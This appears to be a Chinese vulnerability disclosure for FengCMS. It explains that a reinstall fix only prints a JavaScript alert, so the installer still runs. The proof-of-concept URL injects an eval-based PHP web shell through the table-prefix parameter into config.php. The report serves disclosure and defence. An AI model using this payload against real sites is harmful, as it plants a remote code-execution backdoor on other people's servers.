FengCMS 修复不当导致getshell

### 简要描述： FengCMS 修复不当导致getshell，属于修复不当，跟其他的没重复了- -，对审核同学造成的不便深感歉意。 ### 详细说明： 之前提交过一次跟 [WooYun: FengCMS新版本重装](http://www.wooyun.org/bugs/wooyun-2014-067508) 漏洞重复了。现在重新看一下。发现修复的有问题，而且install目录默认是不会自动删除的，依然可以getshell！ ``` header("Content-type:text/html;charset=utf-8"); define("TPL_INCLUDE",1); // 定义当前路径 define('ABS_PATH',dirname(__FILE__)); define('ROOT_PATH',dirname(ABS_PATH)); if(!$_GET['step'])$_GET['step']=1; $config_file=ROOT_PATH.'/config.php'; $install_file=ABS_PATH.'/install.sql'; //这里是修改添加的代码，由于是输出javascript，所以可以无视掉 if(file_exists(ROOT_PATH.'https://images.seebug.org/upload/INSTALL')){ echo '<script type="text/javascript">alert("系统已安装，如需要重新安装，请手工删除upload目录下的INSTALL文件！");</script>'; echo '<meta http-equiv="refresh" content="0;url=/">'; } ``` 所以直接进行setp = 4 的步骤，其中只有DB_PREFIX字段不影响，可以用来getshell。 ### 漏洞证明： 直接访问URL： http://127.0.0.1/install/index.php?host=localhost&user=root&password=root&dbname=hello&prefix=f_');@eval($_POST[101]);('&url_type=1&step=4 [<img src="https://images.seebug.org/upload/201409/191726299ba9a35353fda67f823e1845cdc8dfa0.png" alt="1111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/191726299ba9a35353fda67f823e1845cdc8dfa0.png) [<img src="https://images.seebug.org/upload/201409/19172636a069e7e99449572a464daef0f5c0d08b.png" alt="2222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/19172636a069e7e99449572a464daef0f5c0d08b.png) [<img src="https://images.seebug.org/upload/201409/19172645537eb6196e66026bbc28c4898bd54ab5.png" alt="3333.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/19172645537eb6196e66026bbc28c4898bd54ab5.png)